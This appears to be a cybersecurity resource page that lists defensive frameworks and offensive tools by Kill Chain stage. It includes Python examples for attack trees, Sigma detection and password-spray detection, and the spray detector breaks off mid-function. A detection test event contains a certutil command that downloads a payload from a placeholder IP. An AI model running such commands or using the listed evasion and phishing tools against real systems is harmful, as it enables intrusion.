v2026.05.15

Cyber Security Resources

Curated tools and information for cyber defense

View Changelog
DEFENSE
General Defense Resources

Defense strategies, frameworks and tools are essential for the Blue Team to detect, prevent and respond to cyber threats.

Cybersecurity Frameworks
  • NIST Cybersecurity Framework Free: A set of guidelines for private-sector organizations to be better prepared to identify, detect and respond to cyberattacks. (Resources Library, NIST CSF 2.0)
  • CIS Controls Free: A prioritized set of actions to protect your organization and data against known cyberattack vectors. (Assessment Tool)
  • NIST SP 800-53 Free: Security and privacy controls for information systems and organizations. (Machine Readable Data)
  • PCI DSS Free: Payment Card Industry Data Security Standard for organizations that process payment card data.
  • SOC 2 Free: Service Organization Control 2, the AICPA Trust Services Criteria for service organizations.
  • COBIT Free: Control Objectives for Information and Related Technologies, a framework for IT governance and management. (Auditing COBIT 2019)
  • ISO 27001/27002 Toolkit Open Source: A repository with a comprehensive toolkit designed to help organizations implement an ISO 27001:2022 Information Security Management System (ISMS).
  • ISF SOGP Free: The ISF Standard of Good Practice for Information Security (SOGP), the Information Security Forum's business-oriented set of security controls and guidance.
Cybersecurity HomeLab
  • Kali Linux Free: Offensive toolkit for scanning, exploitation and red teaming. Run it in a VM to scan/exploit the other lab systems.
  • Metasploitable 2 Open Source: Deliberately vulnerable Linux VM for safe exploit practice. Pair with Kali to test & document exploits.
  • Vulnerable-AD Open Source: Insecure Active Directory lab. Use with Windows Server to simulate AD attacks.
  • WebGoat Free: OWASP vulnerable web app. Run locally/in Docker & complete the built-in lessons.
  • Juice Shop Free: Modern OWASP vulnerable app. Host locally & try SQLi, XSS and more.
  • GoPhish Open Source: Phishing simulation platform. Send test phishing emails to lab inboxes.
  • PortSwigger Commercial: Free Web Security Academy labs. Work through the online exploit challenges.
  • Vulnserver Open Source: Windows buffer-overflow practice server. Run in a Win7 VM & exploit with Immunity Debugger.
  • Vulnerable WP Open Source: Exploitable WordPress site. Install locally & test WP-specific exploits.
  • CTFlearn Open Source: CTF challenges for all levels. Solve puzzles to improve across domains.
  • pfSense Free: Firewall/router for segmentation. Place between VMs to control & inspect traffic.
  • Suricata Free: IDS/IPS. Deploy inline with pfSense to detect/block threats.
  • Wazuh Free: SIEM/XDR. Collect & analyze logs from lab machines.
  • OpenSearch Free: Search/visualization stack. Integrate with Wazuh for event dashboards.
  • Security Onion Open Source: Threat detection suite. Process lab traffic for threat hunting.
  • Cowrie Open Source: SSH/Telnet honeypot. Deploy isolated to monitor login attempts.
  • WireGuard Free: VPN. Connect securely to the lab network remotely.
  • Sysmon Free: Windows logging. Install to track security events.
  • Ansible Open Source: Automation tool. Push configurations to multiple lab VMs.
  • MITRE Caldera Free: Adversary emulation. Simulate attacker behavior in test networks.
  • Wireshark Free: Packet capture/analysis. Inspect traffic between lab hosts. (Download)
  • Zeek Free: Network monitoring/logging. Run with Security Onion for deep analysis. (Download)
  • REMnux Free: Malware analysis distribution. Reverse-engineer safely in a VM. (Download)
  • Sigma Open Source: Detection rules. Write rules & test them in Wazuh/Graylog.
  • Proxmox VE Open Source: Virtualization platform for running your lab VMs.
  • Docker Free: Platform for developing, shipping and running applications in containers.
  • Portainer Free: Universal container management UI.
  • Pi-hole Free: Network-wide ad blocking on your own Linux hardware.
  • T-Pot Open Source: The all-in-one honeypot platform.
  • HELK Open Source: The Hunting ELK, a threat hunting platform.
  • Ghidra Free: A software reverse engineering (SRE) suite of tools developed by the NSA.
  • FlareVM Open Source: Windows-based security distribution for malware analysis, incident response, penetration testing, etc.
Threat Modeling Frameworks
  • MITRE ATT&CK Free: A globally accessible knowledge base of adversary tactics and techniques based on real-world observations.
  • Cyber Kill Chain Free: Developed by Lockheed Martin, this framework identifies the steps adversaries must complete to achieve their objective.
  • Diamond Model Free: A cognitive model for intrusion analysis built on four vertices: adversary, infrastructure, capability and victim.
  • STRIDE Free: A threat modeling methodology developed by Microsoft (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege).
  • PASTA Free: Process for Attack Simulation and Threat Analysis, a risk-centric threat modeling methodology.
  • LINDDUN Free: Privacy threat modeling framework (Linkability, Identifiability, Non-repudiation, Detectability, Disclosure of information, Unawareness, Non-compliance). (PILLAR AI Tool)
  • OCTAVE Free: Operationally Critical Threat, Asset, and Vulnerability Evaluation, a risk-based strategic assessment and planning technique.
  • Trike Free: A risk-based threat modeling methodology and tool. (GitHub Repo)
  • Attack Trees Free: Conceptual diagrams showing how an asset or target can be attacked. (ATTop Analysis Tool)
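Attack trees become useful once they are evaluated rather than only drawn: an OR node costs the attacker its cheapest child, an AND node costs the sum of its children, and a control that closes one leaf changes which path is cheapest. The following is an added example written for this page, not code from ATTop or any other tool listed here; the scenario, the node names and the attacker-cost values are all assumed for illustration.

```python
"""Evaluate an AND/OR attack tree for the cheapest attack path and show how
closing a leaf with a control shifts that path.

Added example for this resource page; not code from ATTop or any listed tool.
The scenario, node names and attacker costs below are assumed.
"""
from copy import deepcopy
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

Path = Tuple[float, List[str]]  # (total attacker cost, leaves on the path)


@dataclass
class Node:
    name: str
    gate: str = "LEAF"         # "LEAF", "OR" (any child suffices) or "AND" (all children needed)
    cost: float = 0.0          # attacker cost; only meaningful for leaves
    feasible: bool = True      # False once a control closes this leaf
    children: List["Node"] = field(default_factory=list)


def cheapest_attack(node: Node) -> Optional[Path]:
    """Return the cheapest feasible path through `node`, or None if none exists."""
    if node.gate == "LEAF":
        return (node.cost, [node.name]) if node.feasible else None
    results = [cheapest_attack(child) for child in node.children]
    if node.gate == "OR":
        options = [r for r in results if r is not None]
        return min(options, key=lambda r: r[0]) if options else None
    if node.gate == "AND":
        if any(r is None for r in results):
            return None        # one infeasible step blocks the whole conjunction
        return (sum(r[0] for r in results), [leaf for r in results for leaf in r[1]])
    raise ValueError(f"unknown gate {node.gate!r}")


def mitigate(tree: Node, leaf_name: str) -> Node:
    """Return a copy of `tree` with the named leaf marked infeasible (control applied)."""
    tree = deepcopy(tree)
    stack, found = [tree], False
    while stack:
        n = stack.pop()
        if n.gate == "LEAF" and n.name == leaf_name:
            n.feasible, found = False, True
        stack.extend(n.children)
    if not found:
        raise KeyError(leaf_name)
    return tree


# Assumed scenario: the attacker's goal is to read a customer database.
TREE = Node("Read customer database", "OR", children=[
    Node("Steal DBA credentials", "AND", children=[
        Node("Phish DBA password", cost=2),
        Node("Bypass MFA with real-time phishing proxy", cost=8),
    ]),
    Node("Exploit SQL injection in order-search endpoint", cost=3),
    Node("Steal backup media", "AND", children=[
        Node("Enter datacenter", cost=20),
        Node("Read backup tape", cost=1),
    ]),
])


def walkthrough() -> List[Optional[Path]]:
    """Cheapest path before and after each control, in order."""
    steps = [cheapest_attack(TREE)]
    fixed_sqli = mitigate(TREE, "Exploit SQL injection in order-search endpoint")
    steps.append(cheapest_attack(fixed_sqli))
    fixed_mfa = mitigate(fixed_sqli, "Bypass MFA with real-time phishing proxy")
    steps.append(cheapest_attack(fixed_mfa))
    return steps


if __name__ == "__main__":
    for cost, leaves in walkthrough():
        print(f"cost {cost:>3}: " + " + ".join(leaves))
```

The walkthrough is the point of the exercise: parameterizing the vulnerable query raises the cheapest attack from 3 to 10, and phishing-resistant MFA raises it again to 21, which is the kind of argument that justifies one control over another.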
Threat Modeling Tools
  • OWASP Threat Dragon Open Source: An open source threat modeling tool from OWASP.
  • pytm Open Source: A Pythonic framework for threat modeling.
  • Threagile Open Source: Agile Threat Modeling Toolkit.
  • Threat Composer Open Source: A simple threat modeling tool to help people reduce time-to-value when modeling threats.
  • Microsoft Threat Modeling Tool Free: A tool for creating data flow diagrams to identify threats.
Blue Team Tools

Security Monitoring & SIEM

  • Sysmon Free: Windows system monitor that tracks system activity and logs it to the Windows event log.
  • Wazuh Free: Free and open source security platform that unifies XDR and SIEM capabilities.
  • Security Onion Open Source: A free and open platform for threat hunting, enterprise security monitoring and log management.
  • Elastic Security (ELK) Free: SIEM and endpoint security built on the Elasticsearch and Kibana stack.
  • Velociraptor Open Source: Endpoint visibility and collection tool.
  • SysmonSearch Open Source: Aggregates event logs generated by Microsoft's Sysmon.

Incident Response & Forensics

  • TheHive Free: A scalable, open source and free Security Incident Response Platform.
  • Cortex Open Source: Powerful observable analysis and active response engine.
  • SANS SIFT Free: SANS Investigative Forensic Toolkit.
  • Autopsy Open Source: Digital forensics platform and graphical interface to The Sleuth Kit.
  • Volatility Open Source: Advanced memory forensics framework.
  • KAPE Free: Kroll Artifact Parser and Extractor (free to use, but not open source).

Threat Intelligence

  • MISP Free: Malware Information Sharing Platform and Threat Sharing.
  • OpenCTI Open Source: Open Cyber Threat Intelligence Platform.
  • YARA Open Source: The pattern-matching Swiss army knife for malware researchers.

Analysis & Sandboxing

  • Cuckoo Sandbox Free: Automated malware analysis system.
  • CyberChef Open Source: The Cyber Swiss Army Knife.
  • VirusTotal Free: Analyze suspicious files, domains, IPs and URLs.
  • OpenSSL Open Source: Toolkit for TLS and general-purpose cryptography.
  • Pcredz Open Source: Extracts various types of credentials from packet capture files.

Application Security

  • SafeLine Open Source: Lightweight web application firewall (WAF) with layer 7 protection.
  • Medusa Open Source: Multi-Language Security Scanner with AI-first architecture.
Detection Engineering
  • Sigma Open Source: Generic Signature Format for SIEM Systems.
  • Unprotect Project Open Source: Malware evasion techniques knowledge base.
  • LOLBAS Open Source: Living Off The Land Binaries, Scripts and Libraries.
  • GTFOBins Open Source: List of Unix binaries that can be used to bypass local security restrictions.
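The Sigma, Sysmon and LOLBAS entries above fit together: Sysmon produces the process-creation events, LOLBAS documents which built-in binaries an attacker can abuse, and Sigma expresses the detection logic in a vendor-neutral form that a SIEM backend then compiles. The evaluator below is an added example written for this page, not code from the Sigma project or any listed tool. It implements only the core of a Sigma `detection` block (field selections with the `contains`/`startswith`/`endswith`/`all` modifiers, and `and`/`or`/`not` conditions with parentheses) and runs a hand-written certutil download rule over constructed Sysmon Event ID 1 records; the field names follow Sysmon, the sample events are invented.

```python
"""Minimal evaluator for the core of a Sigma `detection` block, run over
constructed Sysmon Event ID 1 (process creation) records. Added example for
this resource page, not code from the Sigma, Sysmon or LOLBAS projects.
Supported: field maps with `contains`/`startswith`/`endswith`/`all`
modifiers and `and`/`or`/`not` conditions with parentheses; nothing else."""
import re
from typing import Any, Dict, List

# Hand-written rule in the Python form of a Sigma YAML `detection` block.
# Field names follow Sysmon Event ID 1; matching is case-insensitive as in Sigma.
RULE = {
    "title": "Certutil used to download a file (LOLBAS)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection_img": {"Image|endswith": "\\certutil.exe"},
        "selection_cli": {"CommandLine|contains": ["-urlcache", "/urlcache", "-verifyctl", "/verifyctl"]},
        "filter_sccm": {"ParentImage|endswith": "\\ccm\\ccmexec.exe"},  # SCCM client fetching certs
        "condition": "selection_img and selection_cli and not filter_sccm",
    },
}

# Constructed Sysmon Event ID 1 records; not real telemetry.
EVENTS: List[Dict[str, Any]] = [
    {"User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/p.bin C:\\Users\\Public\\p.bin"},
    {"User": "CORP\\admin", "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "certutil -verifystore root"},
    {"User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe",
     "CommandLine": "certutil.exe -urlcache -f http://sccm01.corp.local/CCM_Client/root.cer root.cer"},
    {"User": "CORP\\jdoe", "Image": "C:\\Program Files\\Notepad++\\notepad++.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Program Files\\Notepad++\\notepad++.exe\" notes.txt"},
]


def match_field(record: Dict[str, Any], field_expr: str, expected: Any) -> bool:
    """Evaluate one `Field|modifier...: value(s)` pair against a record."""
    field, *mods = field_expr.split("|")
    if field not in record:
        return False
    value = str(record[field]).lower()
    wanted = [str(v).lower() for v in (expected if isinstance(expected, list) else [expected])]
    op = next((m for m in ("contains", "startswith", "endswith") if m in mods), "equals")
    test = {"equals": lambda w: value == w, "contains": lambda w: w in value,
            "startswith": lambda w: value.startswith(w), "endswith": lambda w: value.endswith(w)}[op]
    return all(map(test, wanted)) if "all" in mods else any(map(test, wanted))


def match_selection(record: Dict[str, Any], selection: Any) -> bool:
    # A map is an AND of its fields; a list of maps is an OR of those maps.
    if isinstance(selection, list):
        return any(match_selection(record, s) for s in selection)
    return all(match_field(record, f, v) for f, v in selection.items())


_TOKEN = re.compile(r"\(|\)|\w+")


def eval_condition(condition: str, truth: Dict[str, bool]) -> bool:
    """Recursive descent over `a and not (b or c)`; `and` binds tighter than `or`."""
    tokens, pos = _TOKEN.findall(condition), 0

    def take():
        nonlocal pos
        if pos >= len(tokens):
            raise ValueError("unexpected end of condition")
        pos += 1
        return tokens[pos - 1]

    def atom():
        tok = take()
        if tok == "(":
            val = expr()
            if take() != ")":
                raise ValueError("unbalanced parentheses")
            return val
        if tok == "not":
            return not atom()
        if tok not in truth:
            raise ValueError(f"unknown selection {tok!r}")
        return truth[tok]

    def chain(operand, keyword, combine):
        val = operand()
        while pos < len(tokens) and tokens[pos] == keyword:
            take()
            val = combine(val, operand())
        return val

    def term():
        return chain(atom, "and", lambda a, b: a and b)

    def expr():
        return chain(term, "or", lambda a, b: a or b)

    result = expr()
    if pos != len(tokens):
        raise ValueError("trailing tokens in condition")
    return result


def evaluate(rule: Dict[str, Any], record: Dict[str, Any]) -> bool:
    det = rule["detection"]
    truth = {name: match_selection(record, sel) for name, sel in det.items() if name != "condition"}
    return eval_condition(det["condition"], truth)


def run(rule: Dict[str, Any], records: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    return [r for r in records if evaluate(rule, r)]


if __name__ == "__main__":
    for hit in run(RULE, EVENTS):
        print(f"[{RULE['title']}] {hit['User']}: {hit['CommandLine']}")
```

Only the first event fires: the second certutil call has no download switch, the third is excluded by the SCCM parent filter, and the fourth is not certutil at all. Real deployments compile the same rule with the Sigma toolchain into the target SIEM's query language; the value of writing the evaluator once is seeing exactly which event shapes a rule does and does not cover before shipping it.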
ATTACK
The Cyber Kill Chain

Information

  • Process Free: Developed by Lockheed Martin, this framework identifies the steps adversaries must complete to achieve their objective.
STEP 1. Reconnaissance

Reconnaissance is the first phase of the Cyber Kill Chain, covering the research, identification and selection of targets.

Tools

Scanners & Frameworks

  • Argus Open Source: Python-powered toolkit for information gathering and reconnaissance.
  • RustScan Open Source: The Modern Port Scanner. Find ports quickly (3 seconds at its fastest). Run scripts through our scripting engine (Python, Lua, Shell supported).
  • Amass Open Source: In-depth Attack Surface Mapping and Asset Discovery.
  • Nmap Free: The "Network Mapper", free and open source utility for network discovery and security auditing.
  • nmapUnleashed Open Source: A CLI wrapper that extends Nmap for penetration testers and network auditors with multithreading and a dashboard.
  • Masscan Open Source: Internet-scale port scanner, transmitting 10 million packets per second.
  • Naabu Open Source: A fast port scanning tool written in Go that enumerates valid ports in a reliable manner.
  • OpenVAS Free: Full-featured vulnerability scanner with extensive testing capabilities.
  • Nikto Open Source: Open Source web server scanner for over 6700 potentially dangerous files/programs.
  • Sn1per Open Source: Automated scanner for enumeration and vulnerability scanning.
  • Osmedeus Open Source: Workflow engine for offensive security, running awesome tools for recon and vulnerability scanning.
  • D0rkerR3con Framework Open Source: Offensive Recon toolkit to discover exposed files, secrets, and launch weaponized Google Dorks.
  • Recon-ng Open Source: Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources.
  • Scanners-Box Open Source: A powerful and open-source toolkit for hackers and security automation.
  • Reconness Open Source: ReconNess helps you to run and keep all your recon in the same place.
  • Lazyrecon Open Source: Script written in Bash to automate tedious tasks of reconnaissance and information gathering.
  • reconFTW Open Source: A powerful automated reconnaissance tool designed for security researchers.
  • axiom Open Source: A distributed dynamic infrastructure framework for offensive security operations.
  • Trivy Open Source: Comprehensive and versatile security scanner for vulnerabilities and misconfigurations.

Domain & DNS

  • Subfinder Open Source: Subdomain discovery tool that discovers valid subdomains for websites by using passive online sources.
  • Puredns Open Source: Fast, professional DNS resolver. Replaces Altdns/Massdns for many workflows.
  • Chaos Open Source: Actively scans and maintains internet-wide assets' data.
  • Dnsprobe Open Source: Tool built on top of retryabledns that allows you to perform multiple DNS queries.
  • Shuffledns Open Source: Wrapper around massdns that allows you to enumerate valid subdomains using active bruteforce.
  • Findomain Open Source: Offers dedicated monitoring service for target domains and alerts.
  • Dnsgen Open Source: Generates a combination of domain names from the provided input.
  • Gotator Open Source: Powerful permutation generation for subdomains.
  • Massdns Open Source: High-performance DNS stub resolver.
  • Sublert Open Source: Security and reconnaissance tool to leverage certificate transparency for monitoring new subdomains.
  • Subjack Open Source: Subdomain Takeover tool written in Go.
  • dnscan Open Source: A python wordlist-based DNS subdomain scanner.

Web & OSINT

  • X-osint Open Source: OSINT tool that gathers useful, credible information about a phone number, a user's email address and an IP address.
  • Wappalyzer Free: Browser extension that uncovers the technologies used on websites.
  • BuiltWith Free: Helps find out what technologies web pages are using.
  • WhatWeb Open Source: Recognizes web technologies including CMS, blogging platforms, statistic/analytics packages, etc.
  • Gau Open Source: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
  • Waybackurls Open Source: Fetch known URLs from the Wayback Machine.
  • Meg Open Source: Tool for fetching lots of URLs without taking a toll on the servers.
  • Katana Open Source: A next-generation crawling and spidering framework.
  • Feroxbuster Open Source: A Rust-based content discovery tool. Faster, smarter, and more modern than Dirb/DirBuster.
  • Dirsearch Open Source: A simple command line tool designed to brute force directories and files in websites.
  • Ffuf Open Source: A fast web fuzzer written in Go.
  • httpx Free: Fast and multi-purpose HTTP toolkit that allows running multiple probes.
  • EyeWitness Open Source: Designed to take screenshots of websites, provide some server header info, and identify default credentials.
  • Gowitness Open Source: Website screenshot utility written in Golang using Chrome Headless.
  • SpiderFoot Open Source: Open source intelligence (OSINT) automation tool.
  • Maltego Commercial: OSINT and graphical link analysis tool for gathering and connecting information.
  • Shodan Commercial: Search engine for Internet-connected devices.
  • Censys Commercial: Scans the most ports and houses the biggest certificate database in the world.
  • Jsluice Open Source: Extract URLs, paths, secrets, and other interesting data from JavaScript source code.
  • Unfurl Open Source: Parse URLs and pull out content based on criteria.
  • Asnlookup Free: Displays information about an IP address's Autonomous System Number (ASN).
  • Virtual-host-discovery Open Source: Enumerates virtual hosts on a given IP address.
  • WitnessMe Open Source: Web Inventory tool, takes screenshots of webpages using Pyppeteer.
  • BBOT Open Source: Recursive internet scanner designed to be faster and more reliable.
  • ENScan_GO Open Source: Tool based on major enterprise information APIs to solve problems in collecting domestic enterprise information (ICP, APP, WeChat, etc.).
  • dismap Open Source: Asset discovery and identification tool for rapid web fingerprint recognition.

Cloud & Git

  • gitGraber Open Source: Monitor GitHub to search and find sensitive data in real time.
  • Shhgit Open Source: Finds secrets and sensitive files across GitHub code and Gists in real-time.
  • gitleaks Open Source: SAST tool for detecting hardcoded secrets in git repos.
  • cloud_enum Open Source: Multi-cloud OSINT tool.
  • S3Scanner Open Source: Scan for open S3 buckets and dump the contents.
  • Gato (Github Attack TOolkit) Open Source: Enumeration and attack tool for GitHub organizations.
  • apk2url Open Source: OSINT tool to extract IP and URL endpoints from APKs.
  • Checkov Open Source: Static analysis tool for Infrastructure as Code (IaC) security and compliance.

Social Media

  • buster Open Source: An advanced tool for email reconnaissance.
  • linkedin2username Open Source: Generate username lists for companies on LinkedIn.
  • LinkedInt Open Source: LinkedIn Recon Tool.

Wireless

  • Kismet Open Source: Wireless network detector, sniffer and IDS.
  • Reaver Open Source: Brute-force attack tool for WPS.
  • Fern Wi-Fi Cracker Open Source: Wireless security auditing and attack tool.
  • Bully Open Source: WPS brute-force attack tool.
  • CoWPAtty Open Source: Brute-force WPA2-PSK password cracking tool.
  • InSSIDer Free: Wi-Fi network scanning and troubleshooting tool.
  • Wifite Open Source: Automated wireless network auditing tool.
  • Wifiphisher Open Source: Rogue access point framework for Wi-Fi security testing.
STEP 2. Weaponization

Weaponization couples a remote access trojan with an exploit into a deliverable payload.

Tools (Payload Development)

  • Ysoserial Open Source: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
  • Payloads All The Things Open Source: A list of useful payloads and bypasses for Web Application Security.
  • GhostStrike Open Source: Deploy stealthy reverse shells using advanced process hollowing.
  • Ivy Open Source: Payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory.
  • PEzor Open Source: Open-Source PE Packer.
  • GadgetToJScript Open Source: Generates .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized.
  • ScareCrow Open Source: Payload creation framework designed around EDR bypass.
  • Donut Open Source: Position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies.
  • Mystikal Open Source: macOS Initial Access Payload Generator.
  • charlotte Open Source: C++ fully undetected shellcode launcher.
  • InvisibilityCloak Open Source: Obfuscation toolkit for C# post-exploitation tools.
  • Dendrobate Open Source: Framework that facilitates the development of payloads that hook unmanaged code through managed .NET code.
  • Offensive VBA and XLS Entanglement Open Source: Examples of how VBA can be used for offensive purposes.
  • xlsGen Open Source: Tiny Excel BIFF8 Generator, to Embedded 4.0 Macros in *.xls.
  • darkarmour Open Source: Windows AV Evasion.
  • InlineWhispers Open Source: Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF).
  • EvilClippy Open Source: Assistant for creating malicious MS Office documents.
  • OfficePurge Open Source: VBA purge your Office documents.
  • ThreatCheck Open Source: Identifies the bytes that Microsoft Defender / AMSI Consumer flags on.
  • CrossC2 Open Source: Generate CobaltStrike's cross-platform payload.
  • Ruler Open Source: Tool that allows you to interact with Exchange servers remotely.
  • DueDLLigence Open Source: Shellcode runner framework for application whitelisting bypasses and DLL side-loading.
  • RuralBishop Open Source: P/Invoke calls replaced with D/Invoke.
  • TikiTorch Open Source: Spawns a new process, allocates memory, then uses CreateRemoteThread to run shellcode.
  • SharpShooter Open Source: Payload creation framework for the retrieval and execution of arbitrary CSharp source code.
  • SharpSploit Open Source: .NET post-exploitation library written in C#.
  • MSBuildAPICaller Open Source: MSBuild Without MSBuild.exe.
  • macro_pack Open Source: Tool used to automatize obfuscation and generation of MS Office documents, VB scripts, etc.
  • inceptor Open Source: Template-Driven AV/EDR Evasion Framework.
  • mortar Open Source: Evasion technique to defeat and divert detection and prevention of security products.
  • ProtectMyTooling Open Source: Multi-Packer wrapper letting us daisy-chain various packers, obfuscators.
  • Freeze Open Source: Payload toolkit for bypassing EDRs using suspended processes, direct syscalls.
  • Shhhloader Open Source: Shellcode loader that compiles a C++ stub to bypass AV/EDR.
  • DllShimmer Open Source: Weaponize DLL hijacking easily.
  • moonwalk Open Source: Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.
STEP 3. Delivery

Delivery is the transmission of the weapon to the target environment.

Phishing Tools

  • Gophish Open Source: Open-source phishing toolkit designed for businesses and penetration testers.
  • Evilginx2 Open Source: Man-in-the-middle attack framework used for phishing credentials and session cookies.
  • Modlishka Open Source: Flexible and powerful reverse proxy for ethical phishing campaigns.
  • o365-attack-toolkit Open Source: A toolkit to attack Office365.
  • PwnAuth Open Source: Web application framework for launching and managing OAuth abuse campaigns.
  • goblin Open Source: A simulation phishing system suitable for red-blue confrontation.
  • Social-Engineer Toolkit (SET) Open Source: Open-source penetration testing framework designed for social engineering.
  • King Phisher Open Source: Phishing campaign toolkit.
  • ReelPhish Open Source: Real-time phishing tool that relays two-factor authentication tokens.
  • Ghost Phisher Open Source: Wireless and Ethernet phishing tool.
  • Credential Harvester Attack Open Source: SET attack module for harvesting credentials.

Other Delivery & Interaction Tools

  • Interactsh Open Source: ProjectDiscovery's OOB interaction server. Critical for blind SSRF/XXE/RCE testing.
  • BeEF Open Source: The Browser Exploitation Framework. Focuses on the web browser.
STEP 4. Exploitation

Exploitation triggers the attacker's code. This phase targets vulnerabilities to gain control or execute code.

Exploitation Frameworks & Tools

  • Metasploit Framework Open Source: The world's most used penetration testing framework.
  • Burp Suite Commercial: The quintessential web app hacking tool.
  • Caido.io Commercial: Lightweight, Rust-based web security toolkit positioned as a Burp Suite alternative (free and paid tiers; not open source).
  • sqlmap Open Source: Automates the process of detecting and exploiting SQL injection flaws.
  • W3AF Open Source: Web Application Attack and Audit Framework.
  • Routersploit Open Source: Exploitation framework for embedded devices.
  • Commix Open Source: Automated all-in-one OS command injection and exploitation tool.
  • Pacu Open Source: The "Metasploit for Cloud." An exploitation framework specifically for AWS.
  • ExploitDB Open Source: The official repository of The Exploit Database.
  • traitor Open Source: Automatic Linux privesc via exploitation of low-hanging fruit.
  • yakit Open Source: Cyber Security ALL-IN-ONE Platform (Exploit, Scanner, Hacking).
  • Shannon Open Source: Autonomous AI pentester that delivers working exploits rather than only findings.
  • SploitScan Open Source: Tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective likelihood of exploitation.
  • Core Impact Commercial: Penetration testing and vulnerability assessment tool.
  • PowerSploit Open Source: Collection of PowerShell scripts for penetration testing and post-exploitation.
  • Armitage Open Source: Graphical front end for the Metasploit Framework.

Web & API Exploitation

  • ZAP (Zed Attack Proxy) Free: Integrated penetration testing tool for finding vulnerabilities in web applications.
  • OWASP PenTest Kit (PTK) Open Source: Browser extension that integrates DAST, IAST, SAST and SCA capabilities directly in the browser, mapping its findings to native ZAP alerts.
  • Acunetix Commercial: Automated web application and API security platform.
  • Invicti Commercial: Enterprise-grade web application and API security platform.
  • Kiterunner Open Source: The best tool for API endpoint discovery (finding hidden/shadow routes).
  • Arjun Open Source: Specialized in finding hidden HTTP parameters that other scanners miss.
  • Dalfox Open Source: Fast, modern XSS scanner.
  • SSRFTest Open Source: SSRF testing tool.
  • Jsluice Open Source: Extract URLs, paths, secrets, and other interesting data from JavaScript source code.
  • ActiveScan++ Open Source: Burp Suite extension that extends active and passive scanning capabilities.
  • Autorize Open Source: Burp Suite extension to detect authorization vulnerabilities.
  • Logger++ Open Source: Multi-threaded logging extension for Burp Suite.
  • Wpscan Open Source: Black box WordPress security scanner.
  • Infection Monkey Open Source: A semi automatic pen testing tool for mapping/pen-testing networks.
  • ACSTIS Open Source: AngularJS Client-Side Template Injection scanner.
  • padding-oracle-attacker Open Source: CLI tool to execute padding oracle attacks.
  • is-website-vulnerable Open Source: Finds publicly known security vulnerabilities in a website's frontend JavaScript libraries.
  • PhpSploit Open Source: Full-featured C2 framework which silently persists on webserver via evil PHP oneliner.
  • Fortify WebInspect Commercial: Scans and assesses web applications for vulnerabilities.
  • Skipfish Open Source: Web application security reconnaissance tool.
  • Grendel-Scan Open Source: Automated web application scanning tool.
  • Vega Open Source: Web vulnerability scanner and testing platform.
  • WebScarab Open Source: Web application vulnerability testing tool.
  • IronWASP Open Source: Web application security testing platform.

Initial Access & Privilege Escalation

  • PEASS-ng Open Source: Privilege Escalation Awesome Scripts SUITE.
  • NetExec (nxc) Free: The successor to CrackMapExec. The #1 tool for network pentesting (SMB/WinRM spraying, AD enumeration).
  • SprayingToolkit Open Source: Scripts to make password spraying attacks.
  • CredMaster Open Source: Refactored & improved CredKing password spraying tool.
  • Kraken Open Source: All-in-One Toolkit for BruteForce Attacks.
  • SweetPotato Open Source: Collection of various native Windows privilege escalation techniques.
  • GodPotato Open Source: Privilege escalation using ImpersonatePrivilege.
  • PrivKit Open Source: Detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.
  • Watson Open Source: Enumerate missing KBs and suggest exploits.
  • SharpUp Open Source: C# port of various PowerUp functionality.
  • dazzleUP Open Source: Detects privilege escalation vulnerabilities caused by misconfigurations.
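The spraying tools above (SprayingToolkit, CredMaster, Kraken) leave a distinct shape in authentication logs: one source tries a small number of passwords against many accounts, which keeps every account under its lockout threshold and looks nothing like a classic brute force against a single account. The detector below is an added example for this page, not code from any listed tool; it runs over constructed Windows Security Event ID 4625 (logon failure) records, using that event's field names, and separates the two patterns with a per-source sliding window. The source addresses, account names and timeline are invented.

```python
"""Separate password spraying from single-account brute force in Windows
Security Event ID 4625 (logon failure) records. Added example for this
resource page, not code from any listed tool; the events are constructed.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set

BASE = datetime(2026, 5, 15, 9, 0, 0)  # constructed timeline start


def failure(minute: float, user: str, ip: str, substatus: str = "0xc000006a") -> Dict:
    """One constructed 4625 record. SubStatus 0xC000006A = bad password,
    0xC0000064 = user does not exist (the latter also reveals account enumeration)."""
    return {"EventID": 4625, "TimeCreated": BASE + timedelta(minutes=minute),
            "TargetUserName": user, "IpAddress": ip,
            "Status": "0xc000006d", "SubStatus": substatus}


EVENTS: List[Dict] = (
    # Spray: one password tried against 12 accounts, about a minute apart.
    [failure(i, f"user{i:02d}", "198.51.100.7") for i in range(12)]
    # Brute force: 40 attempts against one service account, every 30 seconds.
    + [failure(i / 2, "svc_backup", "198.51.100.9") for i in range(40)]
    # Benign: a user mistyping a password twice.
    + [failure(3, "jdoe", "203.0.113.5"), failure(3.5, "jdoe", "203.0.113.5")]
)


def classify_sources(events: List[Dict], window_minutes: int = 30, spray_min_accounts: int = 10,
                     spray_max_per_account: int = 3, bruteforce_min_attempts: int = 20) -> Dict[str, Set[str]]:
    """Per source IP, slide a time window over its failures and test two shapes:
    spray = many distinct accounts, each hit only a few times;
    brute force = one account hit many times. A source can match both."""
    by_source: Dict[str, List[Dict]] = defaultdict(list)
    for e in events:
        if e.get("EventID") == 4625:
            by_source[e["IpAddress"]].append(e)

    window = timedelta(minutes=window_minutes)
    result: Dict[str, Set[str]] = {"password_spray": set(), "brute_force": set()}
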